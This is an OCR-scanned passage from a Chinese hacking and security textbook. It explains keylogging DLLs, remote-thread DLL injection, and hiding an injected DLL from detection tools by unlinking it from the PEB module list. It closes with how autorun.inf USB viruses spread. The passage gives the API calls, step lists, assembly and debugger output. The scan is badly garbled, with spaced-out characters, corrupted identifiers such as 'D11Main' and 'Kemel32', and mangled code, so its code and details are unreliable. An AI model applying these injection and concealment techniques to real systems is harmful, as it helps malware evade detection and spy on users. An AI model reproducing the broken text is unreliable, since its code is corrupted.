析 全 局 钩子 之 前 ， 先 来 了 解 下 什么 是 DLL。 

DLL (Dynamic Link Library) 即 动态 链接 库 ， 因 为 每 个 程序 的 进程 都 有 自己 的 内 存 空 
间 ， 要 监控 键盘 的 所 有 按键 信息 ， 记 录 键 盘 的 程序 就 需要 加 载 进 入 其 他 程序 的 内 存 空间 ， 
然后 记录 这 个 程序 使 用 键盘 的 情况 ， 而 DLL 文件 是 可 以 动态 地 加 载 进 其 他 程序 的 内 存 空 
间 ， 从 而 调用 钩子 函数 进行 键盘 记录 ， 故 需要 将 以 上 3 个 步骤 的 函数 放 入 DLL 文件 内 。 


#include <windows .h> 


#include ... // 头 文件 

// 在 c 语 言 中 , DLL 的 入 口 函数 为 : 

BOOL APIENTRY D11Main( HANDLE hModule, //DLL 模 块 句柄 
DWORD ul reason for call, // 函 数 调用 的 原因 
LPVOID lpReserved // 预 留 值 


extern "C" declspec(dllexport) ”函数 类 型 函数 名 ( 参数 ) ; ”// 导 出 函数 
// 定 义 方式 


} 


还 是 先 来 看 看 DIMain 函 数 参数 的 含义 ， 参 数 一 hModule 即 DLL 自身 的 实例 句柄 ， 指 向 
DLL 文件 被 映射 进 进程 空间 的 地 址 。 

Zul reason for call 是 函数 调用 的 原因 ， 可 以 设置 为 以 下 4 个 值 之 一 。 

> DLL PROCESS_ATTACH/ 被 进程 加 载 ; 

> DLL PROCESS DETACH//jk 3t tR; 

> DLL THREAD ATTACH /进程 创建 新 进程 时 ; 

> DLL THREAD DETACH /线程 终止 时 。 

参数 三 lpReserved， 一 般 不 用 。 
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若 编译 方式 为 CH+〈 默 认 均 为 pp) ， 则 需要 接着 进行 外 链 声明 ， 即 
extern "C" declspec(dllexport) 函数 类 型 函数 名 称 ( 参数 ) ; 


若 编译 方式 为 C 语 言 ， 则 不 需要 extem 声 明 。_declspec (dllexport) 为 导出 函数 标志 。 
加 载 DLL 的 方式 分 为 动态 链接 和 静态 链接 。 
隐 式 链接 : 


#include<"D11 库 头 文件 .h"> ”// 加 载 头 文件 


在 主 函数 “WinMain) 调用 DLL 文 件 的 时 候 ， 需 要 前 置 声明 加 载 该 dl 的 LIB 库 (静态 
包含 在 DLL 中 创建 的 函数 等 ) 文件 。 


#pragma comment ( 1ib，"DLI 文 件 名 .1ib" ) ; 


然后 就 可 以 正常 使 用 DLL 文件 中 的 导出 函数 了 。 
隐 式 链接 的 特点 为 :使 用 方式 简单 ， 但 被 多 次 调用 时 ， 因 内 存 无 法 释放 使 内 存 开 销 
从 而 导致 系统 运行 缓慢 。 


显 式 链接 : 

HINSTANCE hInst = LoadLibrary("DLI 文 件 名 .dll"); // 映 射 内 存 , 得 到 句柄 
typedef 类 型 (*xxx) () // 定 义 函数 指针 
XXX 变量 名 = (XXX )GetProcAddress (hInst, "DLL 导出 函数 名 ") ; 

PEE // 键 盘 记 录 功 能 代码 
FreeLibrary (hInst); // 释 放 内 存 


显 式 链接 比 隐 式 链接 复杂 ， 但 被 多 次 调用 时 的 内 存 开销 小 ， 这 也 是 键盘 记录 程序 作为 


首选 的 原因 。 下 面 接着 分 析 上 面 函 数 : 





HMODULE WINAPI LoadLibrary( 
_In LPCTSTR lpFileName // 加 载 DLL 文 件 进 入 内 存 
); 


该 函数 仅 有 一 个 参数 IpFileName， 若 DLL 文件 和 调用 DLL 的 cpp 原 文件 在 同一 目录 下 ， 


则 参数 可 以 直接 为 “Dll 名 称 .dl”; 若 不 在 同一 个 目录 下 ， 则 需要 写 清楚 要 加 载 的 DLL 文 


件 的 路 径 。 
FARPROC GetProcAddress( // 函 数 返 回 指定 导出 的 DLL 函数 的 地 址 
HMODULE hModule, // 加 载 进 内 存 的 DLI 句 柄 
LPCWSTR lpProcName // 导 出 函数 名 


); 





因为 该 函数 导出 的 是 地 址 信息 ， 所 以 可 以 使 用 相关 指针 进行 接收 。 
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最 后 一 个 函数 如 下 。 
BOOL FreeLibrary( // 释 放 加 载 的 DLL ( 类 似 C/C++ 语 言 中 malloc/new 与 
free/delete 的 对 应 关系 ) 
HMODULE hLibModule // 当 前 加 载 的 DLL 句柄 


932 DLL 注入 


DLL 注入 又 称 远程 线程 注入 。 大 多 数 木马 病毒 为 了 提高 自身 隐蔽 性 、 目 标 程序 的 针对 
性 、 进 程 检 测 软件 的 躲避 等 能 力 ， 均 采用 这 种 方式 。 其 中 远程 则 是 基于 线程 之 间 的 ， 即 通 
过 在 目标 程序 下 创建 线程 来 运行 病毒 功能 。 

先 来 了 解 DLL 注入 需要 用 到 的 函数 ， 然 后 再 通过 其 使 用 步骤 来 认识 它 。 


HANDLE WINAPI OpenProcess(  // 得 到 目标 进程 句柄 


DWORD dwDesiredAccess, // 权 限 设置 
BOOL bInheritHandle, / /句柄 继承 
DWORD dwProcessId // 目 标 PID ( 进程 ID ) 


); 


参数 一 4wDesiredAccess 权 限 通常 设置 为 PROCESS_ALL_ACCESS， 即 享有 全 部 权 
限 。 参 数 二 bInheritHamdle 则 设置 为 FALSE， 即 无 句柄 继承 。 参 数 三 dwProcessId 则 为 目标 
进程 的 PID。 调 用 该 函数 得 到 句柄 ， 这 是 假定 为 hPrcoess。 


LPVOID VirtualAllocEx( // 为 目标 进程 申请 一 段 内 存 空间 
HANDLE hProcess, // 目 标 进程 句柄 
LPVOID lpAddress, // 申 请 内 存 的 起 始 地 址 
DWORD dwSize, // 内 存 大 小 , 以 字 节 为 单位 
DWORD flA11ocationType, // 内 存 类 型 
DWORD flProtect // 内 存 权限 


); 


参数 一 wProcess 为 OpenProcess 得 到 的 进程 句柄 。 参 数 二 IpAddress 一 般 设置 为 NULL， 
也 就 是 由 系统 决定 申请 内 存 的 起 始 地 址 。 参 数 三 dwsize 分 配 的 大 小 应 为 页 内 存 的 整数 倍 。 参 
数 四 fAllocation Type 一 般 选 择 为 MEM_COMMIT， 为 特定 的 页 面 区 域 分 配 内 存 中 或 磁盘 的 页 
面 文 件 中 的 物理 存储 空间 。 参 数 五 HProtecf 为 PAGE READWRITE， 即 可 以 读 写 该 区 域 。 


BOOL WriteProcessMemory ( // 将 信息 写 入 内 存 
HANDLE hProcess, // 目 标 进程 句柄 
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LPVOID lpBaseAddress, // 目 标 进程 内 存 空间 的 首 地 址 
LPVOID lpBuffer, // 写 入 数据 的 缓冲 区 , 包含 写 入 内 存 的 首 地 址 
DWORD nsize, // 写 入 的 字 节 数 


LPDWORD lpNumberOfByteswWritten // 实 际 写 入 的 字 节 数 
); 


参数 二 ]pBaseAddress 即 为 VirtualAllocEx 函 数 申请 到 的 内 存 空间 。 为 了 下 一 步 使 用 远 
程 线程 注入 DLL， 这 步 就 应 该 将 DLL 文件 的 具体 路 径 、 文 件 名 通过 上 述 函 数 写 入 目标 进程 
的 内 存 空间 ， 因 此 VirtualAllocEx 的 参数 三 dwSize 以 及 本 函数 的 参数 四 nSize 则 可 以 是 包含 
DLL 文件 的 具体 路 径 的 字符 串 长 度 。lpBuffer 则 设置 为 DLL 文件 的 具体 路 径 。 


HANDLE CreateRemoteThreadEx( 


HANDLE hProcess, // 目 标 进程 句柄 
LPSECURITY ATTRIBUTES lpThreadAttributes, // 定 义 新 线程 的 安全 撕 术 符 
SIZE T dwstacksize, // 堆 栈 初 始 大 小 
LPTHREAD START ROUTINE lpStartAddress, /7 线程 函数 的 起 始 地 址 
LPVOID lpParameter, // 指 针 传 参 

DWORD dwCreationFlags, /7 线程 运行 状态 
LPPROC THREAD ATTRIBUTE LIST lpAttributeList, // 新 线程 附加 参数 
LPDWORD lpThreadId // 返 回 线程 ID 


); 


参数 二 lpThreadAttributes、 参 数 七 lpAttributeList 以 及 参数 八 lpThreadId 通 常设 置 为 
NULL， 分 别 表示 无 安全 描述 符 、 无 附加 参数 、 无 线程 ID 返 回 。 参 数 三 dwStackSize 若 设置 
为 0， 则 将 以 默认 大 小 运行 程序 。 参 数 四 lpStartAddress 则 设置 为 导出 函数 在 目标 程序 内 存 
中 的 地 址 ，LoadLibrary 函 数位 于 Kemel32.dll 中 ， 几 乎 所 有 进程 启动 均 会 加 载 kernel32.dl1 模 
块 ， 并 且 在 任何 进程 中 该 函数 地 址 相同 ， 可 以 使 用 GetModuleHandle 函 数 从 Kernel32.dll 中 
获得 DLL 句柄 ， 然 后 放 入 GetProcAddress， 进 而 获得 类 型 为 FARPROC 的 LoadLibrary 函 数 加 
载 的 地 址 ， 随 后 转换 其 类 型 为 LPTHREAD START _ROUTINE 即 可 。 而 用 于 传 参 的 指针 则 
是 由 VirtualAllocEx 函 数 返 回 得 到 ， 即 用 于 传递 内 存 分 配 的 信息 。 参 数 dwCreationFlags 设 置 
为 0， 表 示 线 程 被 创建 后 立刻 运行 。 


HMODULE GetModuleHandle( // 得 到 DLL 文件 模块 句柄 
LPCTSTR lpModuleName //DLL 模 块 名 
); 


DWORD WaitForSingleObject(  ” // 用 于 等 待 线程 完成 
HANDLE hHandle, // 句 柄 对 象 


DWORD dwMilliseconds // 等 待 线程 时 间 间 隔 
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); 


参数 一 hbHamdle 设 置 为 由 CreateRemoteThreadEx 返 回 的 线程 句柄 ， 而 参数 二 
dwMiUiseconcls 则 设置 为 INFINITE， 意 为 无 限 等 待 。 


BOOL VirtualFreeEx( // 释 放 使 用 YirtualRl1locEx 分 配 的 内 存 
HANDLE hProcess, // 使 用 0penProcess 返 回 的 目标 进程 句柄 
LPVOID lpAddress, // 指 向 VirtualAllocEx 分 配 的 内 存 地 址 


DWORD dwSize, // 释 放 的 区 域 大 小 , 这 里 必须 设置 为 0, 与 下 一 个 参数 对 应 
DWORD dwFreeType  ”// 自 由 操作 类 型 ,设置 为 MEM_RELEASE, 指向 由 
VirtualAllocEx 分 配 的 区 域 


); 


DLL 注入 具体 分 为 以 下 几 个 步骤 。 

CD 通过 目标 程序 的 PID 〈 进 程 ID ) ， 使 用 OpenProcess 函 数 得 到 进程 句柄 。 

(2) 使 用 VirtualAllocEx 及 得 到 的 句柄 ， 在 目标 进程 下 创建 一 段 内 存 空间 。 

(3) 使 用 WriteProcessMemory 将 DLL 文件 的 路 径 信息 写 入 内 存 。 

(4) 使 用 GetModuleHandle 以 及 GetProcAddress 得 到 LoadLibrary 函 数 的 地 址 (为 了 使 
用 LoadLibrary 加 载 恶意 DLL 文件 ， 需 要 得 到 LoadLibrary 函 数 在 进程 中 的 地 址 ) 。 

(5) 使 用 CreateRemoteThreadEx 启 动 远程 线程 ， 加 载 恶意 DLL 文件 。 

(6) 使 用 WaitForSingleObject 等 待 线程 运行 完毕 退出 。 

(7) 使 用 VirtualFreeEx 释 放 申 请 的 内 存 。 

(8) 使 用 CloseHandle 关 闭 句柄 。 

这 样 病毒 代码 就 加 载 进 了 正常 程序 内 ， 并 且 进 程 监视 等 软件 无 法 检测 到 病毒 运行 的 存 
在 。 当 然 ， 更 加 巧妙 的 隐藏 自身 的 方式 也 可 以 将 代码 直接 写 入 目标 进程 ， 那 么 下 列 步 骤 中 
的 WriteProcessMemory 就 应 将 代码 写 入 内 存 。 随 后 利用 步骤 (4) 得 到 代码 内 使 用 的 API 函 
数位 于 系统 DLL 文件 在 该 进程 内 存 空间 的 位 置 ， 那 么 此 步骤 应 在 目标 进程 空间 内 实现 。 为 
了 便于 得 到 写 入 代码 的 大 小 和 地 址 ， 则 往往 将 其 封装 入 结构 体 ， 再 使 用 sizeof (结构 体 ) 
以 及 取 地 址 符 &〔 结 构 体 ) 就 可 得 到 。 

同时 也 可 以 通过 “隐藏 ”DLL 模块 ， 进 而 隐藏 DLL 文件 名 称 以 及 路 径 来 躲避 检测 工 
具 的 扫描 。 这 就 需要 知道 DLL 模块 在 内 存 中 具体 加 载 的 位 置 ， 然 后 才能 对 其 进行 修改 并 
隐藏 。 因 为 DLL 被 用 于 注入 目标 程序 的 内 存 空 间 ， 所 以 在 PEB 中 就 会 保存 该 DLL 模块 的 信 
息 ， 那 么 所 谓 “ 隐 藏 ”， 也 就 是 对 PEB 中 DLL 模块 的 信息 进行 修改 。 

首先 来 看 一 下 32 位 系统 下 的 TEB 结 构 。 在 WinDbg 中 打开 任意 可 执行 程序 ， 随 后 在 
0: 000 > 后 输入 !teb， 显 示 结 果 如 图 9-75 所 示 。 

从 图 9-75 中 可 以 得 出 TEB 及 PEB 的 地 址 (TEB: 7ffdf000h; РЕВ: 7ffdb000h) 。 随 后 
输入 dt_teb 7ffdf000 来 查看 TEB 结 构 信 息 ， 如 图 9-76 所 示 。 
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0:000> !teb 

TEB at 7ffdf000 
Exceptionlist: 0022fd0c 
StackBase: 00230000 
StackLimit: 0022e000 
SubSystenTib: 00000000 
FiberData: 00001e00 
ArbitraryUserPointer: 00000000 
Self: ?ffdf000 
EnvironmentPointer: 00000000 
ClientId: 000005f0 . 00000с48 
RpcHandle: 00000000 
Tls Storage: 00000000 
РЕВ Address: ?7ffdb000 
LastErrorValue: 0 
LastStatusValue: 0 
Count Owned Locks: 0 
HardErrorMode: 0 


图 9-75 TEB 显 示 结 果 
0:000» dt _teb 7ffdf000 


ntdll!_TEB 
+0х000 NtTib "ED 
+0х01с EnvironmentPointer : (null) 
*0x020 ClientId : CLIENT ID 


+0x028 ActiveRpcHandle : (null) 

+0х02с ThreadLocalStoragePointer : (null) 

+0х030 ProcessEnvironmentBlock : 0x7ffdb000  PEB 
+0х034 LastErrorValue 290 

+0х038 CountOfOwnedCriticalSections : 0 

+0х03с CsrClientThread (null) 

+0х040 Win32ThreadInfo : (null) 


+0х044 User32Reserved “ГЕП 
+0x0ac UserReserved & [5]^U 
+0х0с0 WVOW32Reserved : (null) 
+0х0с4 CurrentLlocale : 0x804 


+0x0c8 FpSoftwareStatusRegister : 0 

+0х0сс SystemReservedl : [54] (null) 

+0х1а4 ExceptionCode : 0n0 

+0х1а8 ÀctivationContextStack :  ACTIVATION CONTEXT STACK 


+0xlbc SpareBytesi : [24] 
+0xld4 GdiTebBatch : .GDI TEB BATCH 


*Üx6b4 RealClientId : ,CLIENT ID 


图 9-76 ТЕВ #4 
这 里 可 以 看 出 PEB 结 构 位 于 TEB 偏 移 0x30 的 地 址 上 。 而 TEB 结 构 的 信息 则 存放 于 FS 寄 
存 器 中 ， 那 么 便 可 以 通过 汇编 指令 mov eax, fs: [0x30] 来 得 到 PEB 的 地 址 。 
下 面 来 查看 PEB 结 构 ， 输 入 dt peb 7ffdb000 得 到 PEB 结 构 信 息 ， 如 图 9-77 所 示 。 


和 " 
0:000» dt | peb Ox7ffdb000 
ntdll! PEB 
+0х000 InheritedàddressSpace : 0 '' 
+0х001 ReadImageFileExecOptions : 0 '' 
+0х002 BeingDebugged y 
+0x003 SpareBool 
+0x004 Mutant Üxffffffff Void 
+0х008 ImageBaseAddress 0x00400000 Void 
+0x00c Ldr : 0x00351ea0 _PEB_LDR_DATA 
+0х010 ProcessParameters : 0x00020000 RTL USER PROCESS PARAMETERS 
+0х014 SubSystemData : (null) 
+0х018 ProcessHeap üx00250000 Void 
+0х01с FastPebLock : 0x7c99d600 RTL CRITICAL SECTION 
+0х020 FastPebLockRoutine : 0x7c921000 Void 
+0х024 FastPebUnlockRoutine : 0х7с9210е0 Void 


9-77 PEB 结 构 
其 中 有 个 重要 的 参数 ， 相 对 PEB 偏 移 地 址 为 0x0c 的 Ldr 结 构 ， 即 struct_PEB_LDR_ 
DATA *Ldr， 其 中 Ldr 为 指向 PEB_LDR_DATA 结 构 的 指针 。 








— m — 


EN 黑客 与 安全 技术 指南 


MSDN 中 PEB 结 构 如 下 。 


typedef struct PEB 

{ 
UCHAR InheritedAddressSpace; 
UCHAR ReadImageFileExecOptions; 
UCHAR BeingDebugged; 
UCHAR SpareBool; 
PVOID Mutant; 
PVOID ImageBaseAddress; 
PPEB LDR DATA Ldr; 

} РЕВ, *PPEB; 


现在 再 使 用 WinDbg 查 看 结构 。 输 入 dt РЕВ LDR DATA 0x00351ea0 查 看 РЕВ LDR - 
DAIA 结 构 〈 见 图 9-78) o 


0:000» dt _PEB_LDR_DATA 0х00351еай 
ntdll! PEB LDR DATÀ 


+0х000 Length : 0x28 
+0x004 Initialized togi "S 
+0х008 SsHandle : (null) 


+0х00с InLoadOrderModulelist : LIST ENTRY [ 0x351ee0 - 0х352040 ] 

+0x014 InMemoryOrderModulelist : LIST ENTRY [ 0х351ее8 - 0x3520d8 J 

+0x0lc InInitializationOrderModulelist : | LIST ENTRY [ 0x351f58 - 0х3520е0 ] 
+0х024 EntryInProgress : (null) 


图 9-78 PEB_LDR_DATA 结 构 
查阅 MSDN。 


typedef struct _РЕВ LDR DATA { 


ULONG Length; //*0x00 
BOOLEAN Initialized; //*0x04 
PVOID SsHandle; //*0x08 


LIST ENTRY InLoadOrderModuleList; 


//+0x0c 双 向 链表 中 包含 进程 中 加 载 模块 的 节点 


LIST ENTRY InMemoryOrderModuleList; 


//*0x14 


LIST ENTRY InInitializationOrderModuleList; //*0xlc 


) PEB LDR DATA, *PPEB LDR DATA; 





这 里 的 
先 来 看 看 它 的 类 型 LIST ENTRY. 





typedef struct LIST ENTRY ( 


点 是 参数 三 ImMemoryOrderModuleList 及 参数 四 ImLoadOrderModuleList， 首 


struct LIST ENTRY *Flink; // 指 向 下 一 个 链表 节点 的 Blink 指 针 
struct LIST ENTRY *Blink; // 指 向 上 一 个 链表 节点 的 Flink 指 针 
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) LIST ENTRY, *PLIST ENTRY, *RESTRICTED POINTER PRLIST ENTRY; 


该 结构 体 包含 两 个 指针 ， 作 为 链接 模块 节点 的 工具 ， 由 此 可 以 看 出 PEB 中 保存 模板 信 
息 是 以 链表 的 形式 构成 的 ， 并 且 参 数 中 的 每 一 项 指向 名 为 LDR DATA TABLE ENTRY 的 
结构 体 : 


typedef struct  LDR DATA TABLE ENTRY { 
PVOID Reservedl[2]; 
LIST ENTRY InMemoryOrderLinks; 
PVOID Reserved? [2]; 
PVOID DllBase; //DLL 模 块 地 址 
PVOID EntryPoint; 
PVOID Reserved3; 
UNICODE STRING FullDllName; //DLL 路 径 名 
BYTE Reserved4[8]; 
PVOID Reserved5[3]; 
union { 
ULONG CheckSum; 
PVOID Reserved6; 
); 
ULONG TimeDateStamp; 
) LDR DATA TABLE ENTRY, *PLDR DATA TABLE ENTRY; 


很 明显 ， 该 结构 体 存放 了 程序 以 及 加 载 的 DLL 模块 的 地 址 DlIBase 和 它们 的 路 径 信 
息 ， 也 就 是 UNICODE _STRING 类 型 的 参数 FullDlIName。 


typedef struct UNICODE STRING { 


USHORT Length; // 长 度 
USHORT MaximumLength; // 最 大 长 度 
PWSTR Buffer; // 缓 冲 区 





UNICODE STRING; 


隐藏 DLL 的 方式 就 是 : 

CD 将 保存 注入 的 DLL 文件 模块 的 信息 链 进行 脱 链 操作 。 

(QD (可 选 ) 将 信息 链 中 保存 的 DLL 路 径 及 文件 名 清除 。 

具体 实现 方法 : 

(1) 定位 到 程序 Ldr 的 地 址 ， 以 Ldr 一 InLoadOrderModuleList.Flink 作 为 遍历 模块 的 入 
HA. 

(2) 遍历 模块 找到 注入 的 DLL 模块 。 
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(3) 对 该 模块 进行 脱 链 、 清 除 信息 等 操作 。 
步骤 一 ， 通 过 使 用 如 下 汇编 代码 。 


asm 


ü 


mov eax, fs:[0x30] // 得 到 PEB 地 址 
mov eax, [eax + 0x0C] // 得 到 Ldr 地 址 
mov pLdr, eax // 将 地 址 放 入 使 用 *PPEB LDR_DATA 定 义 的 pLdr 中 
} 
当然 也 可 以 使 用 : 
asm 
t 
mov eax, fs:[0x30] // 得 到 PEB 地 址 
mov рРЕВ, еах // 将 地 址 存放 入 PPEB 声 明 类 型 的 pPEB 中 


) 


接着 使 用 pPEB 一 Ldr 一 InLoadOrderModuleList.Flink 得 到 模块 链表 遍历 入 口 点 。 

步骤 二 ， 使 用 一 个 循环 以 pLdr 一 InLoadOrderModuleList.Flink 作 为 链表 头 指 针 进行 模 
块 遍历 ， 通 过 判断 DLL 模块 地 址 ， 搜 寻 注 入 DLL 文件 的 模块 所 在 节点 。 

步骤 三 ， 脱 链 操作 也 就 是 将 所 在 节点 的 上 下 相 邻 节点 的 Flink、Blink 指 针 指向 进行 修 
改 ， 指 针 的 指向 将 跳 过 该 注入 DLL 模块 的 节点 ， 那 么 该 节点 就 从 链表 中 脱离 出 来 ， 也 就 
实现 了 隐藏 DLL 操 作 ， 而 清除 信息 则 是 使 用 memset 等 函数 对 参数 FullDIIName 进 行 清 零 
处 理 。 

首先 使 用 CONTAINING_RECORD 函 数 来 获得 LDR_DATA_TABLE_ENTRY 结 构 的 
地 址 。 

注意 : Flink 指 向 的 是 LDR_ DATA TABLE ENTRY 2 4j 'P 6ñInMemoryOrderLinks 
成 员 ， 因 此 需要 得 到 一 个 指向 LDR_DATA_TABLE_ENTRY 结 构 的 指针 ， 即 使 用 
CONTAINING RECORD 函 数 。 


PCHAR CONTAINING RECORD ( // 返 回 成 员 中 包含 的 结构 类 型 的 地 址 


PCHAR Address, // 成 员 地址 
TYPE Type, // 结 构 类 型 
PCHAR Field // 结 构成 员 


); 


在 这 里 的 用 法 则 是 PLDR DATA TABLE ENTRY pLdrDataEntry = CONTAINING _ 
RECORD (pLdr—InLoadOrderModuleList.Flink, LDR DATA TABLE ENTRY, 
InMemoryOrderLinks) ， 随 后 便 可 以 使 用 pLdrDataEntry 一 FullDIIName buffer 得 到 DLL 文件 
信息 ， 最 后 使 用 memset 进 行 清 零 。 
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而 在 64 位 系统 中 ， 使 用 WinDbg 查 看 同一 程序 的 情况 则 不 同 于 32 位 系统 ， 如 图 9-79、 


图 9-80 所 示 。 

Wow64 TEB at 000000007efdb000 
EzceptionList: 000000007еғааооо 
StackBase: 000000000008#920 
StackLimit: 000000000008с000 
SubSystemTib: 0000000000000000 
FiberData: 0000000000001е00 
ArbitrarylUserPointer: 0000000000000000 
Self: 000000007efdb000 
EnvironmentPointer: 0000000000000000 
ClientId: 0000000000001864 0000000000001990 
RpcHandle: 0000000000000000 
Tls Storage: 0000000000000000 
РЕВ Address: 00000000 7е#ағ000 
LastErrorValue: 0 
LastStatusValue: 0 
Count Owned Locks: 0 
HardErrorMode: 0 

图 9-79 64 位 TEB 结 构 

0:000» dt _teb Ox7efdb000 
0:000» dt teb 0x7efdb000 
ntdll! TEB 

+0х000 NtTib : _NT_TIB 

+0х038 EnvironmentPointer : (null) 

+0х040 ClientId : ,CLIENT ID 

+0х050 AÀctiveRpcHandle (null) 

+0х058 ThreadLocalStoragePointer : (null) 


+0х060 ProcessEnvironmentBlock : 
+0х068 LastErrorValue :0 
+0х06с CountOf OwnedCriticalSections 


+0х070 CsrClientThread (null) 
+0x078 Win32ThreadInfo (null) 
+0х080 User32Reserved [26] 0 
+0х0е8 UserReserved [5] 0 
+0х100 WOW32Reserved (null) 


图 9-80 ”32 位 TEB 结 构 


0x00000000'7efdf000 _PEB 


PEB 地 址 偏 移 并 不 是 之 前 的 0x*30 了 ， 而 是 0x60， 继 续 查 看 EB 结构 ， 如 图 9-81 所 示 。 


ntdll!_PEB 
+0х000 InheritedàddressSpace 0" 
+0х001 ReadImageFileExecOptions : 0 '' 
+0x002 BeingDebugged sU '' 
*0x003 BitField Ж. Ж 
+0х003 ImageUsesLargePages : 0у0 
+0х003 IsProtectedProcess : 0y0 
+0х003 IsLegacyProcess : буй 
+0х003 IsImageDynamicallyRelocated : 0у0 
+0x003 SkipPatchingUser32Forwarders 0у0 
+0х003 SpareBits 0у000 
+0х008 Hutant 
+0х010 ImageBaseàddress : 
+0х018 Ldr 
+0х020 ProcessParameters 


图 9-81 64 位 PEB 结 构 


: Üxffffffff'ffffffff Void 
0x00000000'00400000 Void 
: 0х00000000`77992640 _РЕВ LDR DATA 
: 0x00000000'00732340 , RTL USER PROCESS PARAMETERS 


Ldr 的 偏 移 地 址 同样 也 发 生 了 改变 ， 偏 移 地 址 改 为 0x18。 
那么 对 应 的 FS 寄存 器 中 的 值 也 需要 进行 改变 。 接 下 来 ， 介 绍 另 一 种 方式 即使 用 API 函 


数 进行 获取 PEB 地 址 的 操作 。 


WINAPI NtQueryInformationProcess( 


HANDLE ProcessHandle, 


PROCESSINFOCLASS ProcessInformationClass, 


— э — 


// 检 索 指 定 进程 的 信息 
// 进 程 句柄 
// 检 索 信息 类 型 
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PVOID ProcessInformation, // 写 入 信息 的 缓冲 区 
ULONG ProcessInformationLength, // 缓 冲 区 大 小 
PULONG ReturnLength // 返 回信 息 大 小 


参数 一 指定 为 目标 进程 句柄 ， 参 数 二 ProcessInformationClass 可 取 下 列 值 。 


typedef enum _PROCESSINFOCLASS ( 
ProcessBasicInformation, //PEB 结 构 信 息 
ProcessDebugPort, // 调 试 端 口 
ProcessQuotaLimits, 
ProcessIoCounters, 
ProcessVmCounters, 
ProcessTimes, 
ProcessBasePriority, 
ProcessRaisePriority, 
ProcessDebugPort, // 检 索 DWORD_PTR 类 型 , 调试 程序 的 端口 号 
ProcessExceptionPort, 
ProcessAccessToken, 
ProcessLdtInformation, 
ProcessLdtSize, 
ProcessDefaultHardErrorMode, 
ProcessIoPortHandlers, 
ProcessPooledUsageAndLimits, 
ProcessWorkingSetWatch, 
ProcessUserModeIOPL, 
ProcessEnableAlignmentFaultFixup, 
ProcessPriorityClass, 
ProcessWx86Information, 
ProcessHandleCount, 
ProcessAffinityMask, 
ProcessPriorityBoost, 
ProcessDeviceMap, 
ProcessSessionInformation, 
ProcessForegroundInformation, 
ProcessWow64Information，// 程 序 运行 的 环境 是 否 为 64 位 系统 
ProcessImageFileName，// 检 索 UNICODE STRING 类 型 ,包含 图 像 文 件 的 名 称 


ProcessLUIDDeviceMapsEnabled, 
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ProcessBreakOnTermination，// 检 索 ULONG 类 型 , 指示 程序 关键 处 
ProcessDebugObjectHandle, 
ProcessDebugFlags, 
ProcessHandleTracing, 
ProcessIoPriority, 
ProcessExecuteFlags, 
ProcessTlsInformation, 
ProcessCookie, 
ProcessImageInformation, 
ProcessCycleTime, 
ProcessPagePriority, 
ProcessInstrumentationCallback, 
ProcessThreadStackAllocation, 
ProcessWorkingSetWatchEx, 
ProcessImageFileNameWin32, 
ProcessImageFileMapping, 
ProcessAffinityUpdateMode, 
ProcessMemoryAllocationMode, 
ProcessGroupInformation, 
ProcessTokenVirtualizationEnabled, 
ProcessConsoleHostProcess, 
ProcessWindowInformation, 
MaxProcessInfoClass 


) PROCESSINFOCLASS; 


这 里 ， 显 然 取 ProcessBasicInformation， 其 中 保存 了 PEB 结 构 信 息 。 


typedef struct PROCESS BASIC INFORMATION { 
PVOID Reservedl; 
PPEB PebBaseAddress; 
PVOID Reserved2[2]; 
ULONG PTR UniqueProcessId; 
PVOID Reserved3; 
) PROCESS BASIC INFORMATION; 


该 结构 体 的 参数 二 即 为 PEB 结 构 的 基地 址 ， 也 正 是 我 们 需要 得 到 的 信息 。 
函数 中 参数 三 ProcessInformation 用 来 接收 PEB 信 息 的 缓冲 区 (以 PROCESS_BASIC_ 
INFORMATION 类 型 声明 缓冲 区 接收 信息 ) ， 参 数 四 ProcessInformationLength 表 示 信 息 的 
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大 小 〈sizeof 即 可 ) 。 该 函数 并 未 被 微软 公开 ， 因 此 需要 使 用 GetProcAddress 和 LoadLibrary 
从 Ntdll.dll 中 获取 该 函数 地 址 。 调 用 该 函数 以 后 ， 便 得 到 了 PEB 结 构 的 地 址 。 


9.3.3 ”autorun.inf 一 一 风靡 一 时 


U 盘 病毒 在 2007 年 大 规模 爆发 ， 并 且 危 害 很 大 。2011 年 ， 随 着 微软 发 布 名 为 KB967940 
的 补丁 后 ，U 盘 病毒 在 XP 系统 下 主动 传播 功能 近乎 失效 ， 如 今 在 Windows 7/8 甚 至 10 普 及 的 今 
天 ，U 盘 病毒 更 是 失去 了 效果 ， 但 其 原理 却 是 值得 一 探究 竟 的 。 

病毒 主要 利用 了 autorun.inf 的 特性 一 一 随 U 盘 打开 而 自动 运行 的 功能 。 以 记事 本 的 形式 
打开 该 文件 ， 则 文件 如 图 9-82 所 示 。 

autorun.inf 文 件 ( 见 图 9-83) 格式 一 般 如 下 : 


[AutoRun] 
open= 打 开 的 程序 
该 程序 往往 是 隐藏 在 U 盘 中 的 病毒 文件 。 下 面 的 shell 等 同样 也 起 到 打开 文件 的 作用 。 


区 Ama) 100) EB) - 


utoRun. 
en-coink. exe 
iellexecute-coink. exe 

打开 (80) coi 


图 9-82 autorun.inf(1) 图 9-83 autorun.inf(2) 

就 本 例 来 说 ， 内 置 该 文件 的 U 盘 被 双击 打开 以 后 ， 会 自动 运行 coink.exe 病 毒 。 该 病毒 
则 会 将 自身 复制 进 系统 目录 ， 然 后 添加 到 自 启 项 ， 实 现 木 马 病毒 等 功能 。 该 病毒 通过 监控 
USB 接 口 信息 ， 一 旦 检测 到 有 U 盘 插入 ， 则 复制 自身 进入 U 盘 并 创建 改写 U 盘 的 autorun.inf 
文件 ， 然 后 通过 隐藏 自身 来 实现 感染 U 盘 的 目的 ， 进 而 继续 进行 传播 。 接 下 来 具体 认识 它 
的 这 些 功 能 是 如 何 实现 的 。 

病毒 一 般 会 创建 三 个 文件 ， 在 系统 根 目录 下 和 U 盘 中 创建 自身 ， 即 可 执行 病毒 (exe、 
com 等 文件 ) ， 在 U 盘 里 创建 或 替换 autorun.inf 文 件 。 

病毒 检测 U 盘 的 手段 并 不 神秘 ， 不 过 是 使 用 了 GetDriveType 函 数 而 已 。 




















UINT WINAPI GetDriveType( 
LPCTSTR lpRootPathName // 盘 符 名 称 
); 


参数 显然 为 盘 符 的 名 称 了 ， 例 如 C: 。 函 数 的 返回 值 若 为 DRIVE_ REMOVABLE, 
则 表示 是 移动 存储 设备 ， 如 U 盘 等 ， 若 为 DRIVE_FIXED， 则 为 固定 硬盘 ， 若 为 DRIVE_ 
